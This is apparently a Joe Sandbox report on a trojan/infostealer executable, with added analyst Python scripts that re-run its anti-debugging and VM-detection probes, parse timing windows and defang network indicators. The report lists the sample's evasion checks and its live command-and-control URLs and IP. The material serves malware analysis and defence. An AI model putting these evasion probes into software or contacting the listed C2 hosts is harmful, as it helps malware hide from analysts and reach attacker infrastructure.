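        return [t for _, m, t in self.insns if m != "rdtsc" and m not in FILLER]


def mnemonic_of(text):
    words = text.split()
    if words[0] in PREFIXES and len(words) > 1:
        return words[1]
    return words[0]


def parse_line(line):
    """Return a Window for an interceptor line, or None for any other report line."""
    m = HEADER_RE.search(line)
    if not m:
        return None
    insns = [(int(off, 16), mnemonic_of(text), text) for off, text in INSN_RE.findall(m.group(3))]
    return Window(int(m.group(1), 16), int(m.group(2), 16), insns)


def parse_lines(lines):
    return [w for w in (parse_line(l) for l in lines) if w]


def chains(windows):
    """Group consecutive windows whose second rdtsc is the next window's first:
    one chain is one uninterrupted run of back-to-back timing reads."""
    out = []
    for w in windows:
        if out and out[-1][-1].second == w.first:
            out[-1].append(w)
        else:
            out.append([w])
    return out


def rdtsc_reads(windows):
    """Distinct rdtsc executions: a chain of n windows shares n-1 of its reads."""
    return sum(len(c) + 1 for c in chains(windows))


if __name__ == "__main__":
    ws = parse_lines(SAMPLE_LINES)
    for w in ws:
        print(f"{w.first:08X}->{w.second:08X} span={w.span:3d} insns={len(w.insns):2d} payload={w.payload()}")
    print("chain lengths:", [len(c) for c in chains(ws)], "distinct rdtsc reads:", rdtsc_reads(ws))
```

Feed the script the whole report and the chain lengths tell you how many windows the protector strings together per function prologue; the payload lists show that the only non-filler work in the 71E0214 window is the `lock bts` flag test and its `jc`, which is where a sandbox that replays rdtsc with a fixed step would be caught.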
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Special instruction interceptor: First address: D59058 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Special instruction interceptor: First address: D669B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Special instruction interceptor: First address: DE6E0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_01974ECE rdtsc 0_3_01974ECE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D (listed twice in the report)
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: HrIrtCXI3s.exe | Binary or memory string: Hyper-V RAW
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: HrIrtCXI3s.exe, 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HrIrtCXI3s.exe, 00000000.00000003.1974181847.000000000196C000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014537750.000000000196D000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973750389.0000000001961000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973460711.0000000001951000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973498002.000000000195E000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1861876953.0000000001903000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File opened: NTICE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File opened: SICE
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Process queried: DebugPort (3 times)
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Code function: 0_3_01974ECE rdtsc 0_3_01974ECE
Source: HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (4 times)
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
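The window-class, device-name, DebugPort and registry probes listed in this section are cheap to reproduce, and running them on the analysis image is the fastest way to learn which ones the image would fail before the sample does. The script below is an added example written for that purpose; it is not the sample's code and not Joe Sandbox tooling. It issues the same FindWindow lookups, CreateFile opens on the \\.\NTICE-style SoftICE device names, NtQueryInformationProcess(ProcessDebugPort) and registry reads, using the names from this report, and returns which of them trip. The thread-hiding call the report logs (NtSetInformationThread with ThreadHideFromDebugger, 0x11) is declared for reference but deliberately not issued. Assumptions: 64-bit CPython on Windows for the live run; on any other platform run_checks() returns an empty list and only the pure helpers execute.

```python
"""Re-run the anti-analysis probes this report attributes to the sample against
the host you are on. Added example for validating a sandbox image; not the
sample's code, not Joe Sandbox tooling. Names come from the report's behaviour
lines, API prototypes from the documented Win32/NT signatures."""
import ctypes
import sys

# Window classes and titles probed via FindWindow ("Open window title or class name").
WINDOW_NAMES = [
    "regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
]
# SoftICE control devices probed via CreateFile("\\.\<name>") ("File opened").
DEVICE_NAMES = ["NTICE", "SICE", "SIWVID"]
# Registry values read for hypervisor fingerprints ("Registry key queried").
REGISTRY_PROBES = [
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
]
VM_MARKERS = ("vbox", "virtualbox", "vmware", "qemu", "hyper-v", "virtual", "bochs", "parallels")
PROCESS_DEBUG_PORT = 7            # PROCESSINFOCLASS for NtQueryInformationProcess
THREAD_HIDE_FROM_DEBUGGER = 0x11  # THREADINFOCLASS behind the report's "HideFromDebugger" line (not issued here)
GENERIC_READ, FILE_SHARE_READ_WRITE, OPEN_EXISTING = 0x80000000, 0x3, 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value


def looks_virtual(value):
    """True when a BIOS or driver string names a known hypervisor."""
    return any(marker in str(value).lower() for marker in VM_MARKERS)


def interpret(findings):
    """findings: [(kind, detail, tripped)]. Pure, so the verdict logic is checkable offline."""
    tripped = [f for f in findings if f[2]]
    return {"tripped": tripped, "would_abort": bool(tripped)}


def run_checks():
    """Perform the probes on Windows; returns [] elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg
    k32, u32, ntdll = ctypes.windll.kernel32, ctypes.windll.user32, ctypes.windll.ntdll
    findings = []

    # 1. FindWindowW by class name, then by window title.
    u32.FindWindowW.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p]
    u32.FindWindowW.restype = ctypes.c_void_p
    for name in WINDOW_NAMES:
        hit = u32.FindWindowW(name, None) or u32.FindWindowW(None, name)
        findings.append(("window", name, bool(hit)))

    # 2. CreateFileW on the SoftICE devices; a valid handle means the driver is loaded.
    k32.CreateFileW.argtypes = [ctypes.c_wchar_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p,
                                ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p]
    k32.CreateFileW.restype = ctypes.c_void_p
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    for dev in DEVICE_NAMES:
        h = k32.CreateFileW("\\\\.\\" + dev, GENERIC_READ, FILE_SHARE_READ_WRITE, None, OPEN_EXISTING, 0, None)
        opened = h not in (None, INVALID_HANDLE_VALUE)
        if opened:
            k32.CloseHandle(h)
        findings.append(("device", dev, opened))

    # 3. NtQueryInformationProcess(ProcessDebugPort): a non-zero port means a debugger is attached.
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    ntdll.NtQueryInformationProcess.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p,
                                                ctypes.c_uint32, ctypes.c_void_p]
    ntdll.NtQueryInformationProcess.restype = ctypes.c_long
    port = ctypes.c_void_p(0)
    status = ntdll.NtQueryInformationProcess(k32.GetCurrentProcess(), PROCESS_DEBUG_PORT,
                                             ctypes.byref(port), ctypes.sizeof(port), None)
    findings.append(("debugport", hex(port.value or 0), status == 0 and bool(port.value)))

    # 4. Registry fingerprints (SystemBiosVersion is REG_MULTI_SZ, so str() of the list is searched).
    for path, value in REGISTRY_PROBES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                data = winreg.QueryValueEx(key, value)[0]
        except OSError:
            data = ""
        findings.append(("registry", f"{path}\\{value} = {data}", looks_virtual(data)))
    return findings


if __name__ == "__main__":
    for kind, detail, tripped in run_checks():
        print(f"{'TRIPPED' if tripped else 'ok     '} {kind:9s} {detail}")
```

Run it once on the clean image and once under the debugger and anti-anti-debug plugin you intend to use; anything still reported as tripped is visible to the sample as well. Two of the report's own hits deserve a caveat when you compare results: the "Hyper-V RAW" memory string sits next to %SystemRoot%\system32\mswsock.dll in the dumps above, which is the Winsock provider name that mswsock.dll carries on every Windows 10 install, so it is not evidence that the sample detected a hypervisor; and the MachineGuid read is a host fingerprint for the C2, not a VM check.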

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 5.101.3.217:80
MITRE ATT&CK matrix (one line per tactic, techniques in the order the matrix lists them; a leading number is the report's signature-count badge for that technique, copied as rendered, and techniques without a number are the matrix's default, untriggered entries):
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task
Persistence: 1 DLL Side-Loading | Boot or Logon Initialization Scripts | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts
Privilege Escalation: 1 Process Injection | 1 DLL Side-Loading | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion | 1 Process Injection | 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 12 Software Packing | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials
Discovery: 751 Security Software Discovery | 23 Virtualization/Sandbox Evasion | 13 Process Discovery | 1 Remote System Discovery | 1 File and Directory Discovery | 216 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC
Collection: 11 Archive Collected Data | 1 Data from Local System | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture
Command and Control: 11 Encrypted Channel | 4 Ingress Tool Transfer | 4 Non-Application Layer Protocol | 5 Application Layer Protocol | Fallback Channels | Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop

Antivirus, machine learning and URL detections for the initial sample:
Source | Detection | Scanner | Label
HrIrtCXI3s.exe | 39% | ReversingLabs | Win32.Trojan.Generic
HrIrtCXI3s.exe | 100% | Avira | TR/Crypt.TPM.Gen
HrIrtCXI3s.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL detections:
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l- | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | 0% | Avira URL Cloud | safe
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high
URLs from memory and binary strings:
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | HrIrtCXI3s.exe | false | | high
https://httpbin.org/ipbefore | HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | HrIrtCXI3s.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4 | HrIrtCXI3s.exe, 00000000.00000002.2014039691.00000000018CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html# | HrIrtCXI3s.exe | false | | high
https://curl.se/docs/alt-svc.html | HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l- | HrIrtCXI3s.exe, 00000000.00000003.1973567239.0000000001903000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014121507.0000000001905000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973782520.0000000001904000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.css | HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmp | false | | high
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
5.101.3.217 | home.fiveth5ht.top | Russian Federation | 34665 | PINDC-ASRU | false
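The network tables above mix three kinds of entry: URLs the sample actually requested, IP and ASN resolutions, and URL-like strings carved from memory, several of which are truncated or run into one another (the ...XF17, ...4fd4 and ...?argument=0l- variants, and the doubled http:// string). The script below is an added example, not Joe Sandbox output: it defangs the indicators, attaches the resolved IP and ASN, attributes each memory fragment to the live URL it shares the longest prefix with (so the fragments collapse onto the two real endpoints while the curl.se documentation links, which are libcurl's own strings, and the http://.css remnant stay unattributed), and flags the 10-digit run in the C2 path as a possible Unix timestamp. That timestamp reading is a hypothesis for the analyst to weigh, not a fact stated in the report; the inputs are copied from the tables above.

```python
"""Normalise the network indicators of this report into defanged IOCs and map the
truncated URL strings recovered from memory onto the URLs actually contacted.
Added example; not Joe Sandbox output."""
import re
from datetime import datetime, timezone
from os.path import commonprefix
from urllib.parse import urlsplit

# Constructed from the report: URLs seen in live traffic ...
CONTACTED_URLS = [
    "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0",
    "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862",
    "https://httpbin.org/ip",
]
# ... URL-like strings carved from process memory, including truncated and run-together ones ...
MEMORY_STRINGS = [
    "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17",
    "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS",
    "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4",
    "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l-",
    "https://httpbin.org/ipbefore",
    "https://curl.se/docs/hsts.html",
    "http://.css",
]
# ... and the resolutions from the IP table.
RESOLVED = {
    "home.fiveth5ht.top": ("5.101.3.217", "34665 PINDC-ASRU"),
    "httpbin.org": ("34.226.108.155", "14618 AMAZON-AESUS"),
}


def defang_dots(value):
    """Defang a hostname or dotted IP so it cannot be clicked or resolved by accident."""
    return value.replace(".", "[.]")


def defang_url(url):
    parts = urlsplit(url)
    head = len(parts.scheme) + 3 + len(parts.netloc)  # scheme + "://" + host
    return f"{parts.scheme.replace('http', 'hxxp')}://{defang_dots(parts.netloc)}{url[head:]}"


def attribute(memory_strings, contacted):
    """Map each memory string to the contacted URL sharing the longest prefix with it.
    A fragment must cover at least scheme://host to count; ties prefer a URL the
    fragment covers completely, then the shorter URL."""
    result = {}
    for s in memory_strings:
        best = None
        for url in contacted:
            parts = urlsplit(url)
            n = len(commonprefix([s, url]))
            if n < len(parts.scheme) + 3 + len(parts.netloc):
                continue
            key = (n, n == len(url), -len(url))
            if best is None or key > best[0]:
                best = (key, url)
        result[s] = best[1] if best else None
    return result


def timestamp_hint(url):
    """Hypothesis, not a report fact: a lone 10-digit run in the path may be a Unix
    timestamp (build or campaign time). Returns an aware UTC datetime or None."""
    m = re.search(r"(?<!\d)(\d{10})(?!\d)", urlsplit(url).path)
    return datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc) if m else None


def iocs(contacted, resolved):
    """One defanged record per contacted URL, with the resolved IP/ASN when known."""
    out = []
    for url in contacted:
        host = urlsplit(url).netloc
        ip, asn = resolved.get(host, (None, None))
        out.append({"url": defang_url(url), "host": defang_dots(host),
                    "ip": defang_dots(ip) if ip else None, "asn": asn,
                    "ts_hint": timestamp_hint(url)})
    return out


if __name__ == "__main__":
    for row in iocs(CONTACTED_URLS, RESOLVED):
        print(row)
    for fragment, url in attribute(MEMORY_STRINGS, CONTACTED_URLS).items():
        print(f"{fragment!r:100} -> {url}")
```

The attribution step is what keeps the blocklist honest: only the two home.fiveth5ht.top endpoints and the httpbin.org IP-echo request go into it, and the memory fragments are recorded as evidence for those entries rather than as six separate "URLs". The https://httpbin.org/ip request itself is the sample asking a public service for the victim's external IP, which is why the report marks the domain as not malicious even though the request is part of the infection.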
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580954
Start date and time: 2024-12-26 14:13:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HrIrtCXI3s.exe (renamed because the original name is a hash value)
Original Sample Name: 629763eb39d91bb69848475c90ad1e63.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:14:05 | Task Scheduler | Run new task: {6FD9324A-ED7A-441F-9B61-9ED31D5C4380} path:
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            34.226.108.155vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                              jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                  gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                    x6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              nRYpZg6i5E.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | vJPhYDClT5.exe | malicious | Unknown | 34.226.108.155
httpbin.org | jklg6EIhyR.exe | malicious | Unknown | 34.226.108.155
httpbin.org | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
httpbin.org | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
httpbin.org | gDPzgKHFws.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | HFoyAy1tg8.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | 8kl5nJ3f9x.exe | malicious | Cryptbot | 98.85.100.80
httpbin.org | 7kf4hLzMoS.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
httpbin.org | WCeE1A6Xyz.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
Match | Associated Sample Name / URL | Detection | Threat Name | Context
PINDC-ASRU | 6ufJvua5w2.exe | malicious | CryptOne, Stealc, Vidar | 91.215.85.11
PINDC-ASRU | Ransomware Mallox.exe | malicious | Targeted Ransomware | 91.215.85.142
PINDC-ASRU | 3cb770h94r.elf | malicious | Okiru | 45.145.172.130
PINDC-ASRU | na.elf | malicious | Mirai | 5.188.210.194
PINDC-ASRU | na.elf | malicious | Mirai, Moobot | 5.8.21.138
PINDC-ASRU | lK1DKi27B4.dll | malicious | Unknown | 80.87.206.189
PINDC-ASRU | lK1DKi27B4.dll | malicious | Unknown | 80.87.206.189
PINDC-ASRU | https://trstwalsecu.com/ | malicious | Unknown | 91.215.85.16
PINDC-ASRU | https://metamaskinf.com/ | malicious | Unknown | 91.215.85.79
PINDC-ASRU | http://mygovau-service.com/ | malicious | Unknown | 91.215.85.79
AMAZON-AESUS | vJPhYDClT5.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | jklg6EIhyR.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | xd.mips.elf | malicious | Mirai | 34.206.168.77
AMAZON-AESUS | xd.x86.elf | malicious | Mirai | 44.213.56.197
AMAZON-AESUS | telnet.arm.elf | malicious | Unknown | 18.209.195.84
AMAZON-AESUS | telnet.sh4.elf | malicious | Unknown | 35.175.156.177
AMAZON-AESUS | armv5l.elf | malicious | Mirai | 44.206.15.113
AMAZON-AESUS | https://fsharetv.co/ | malicious | Unknown | 54.225.185.110
                                                No context
                                                No context
                                                No created / dropped files found
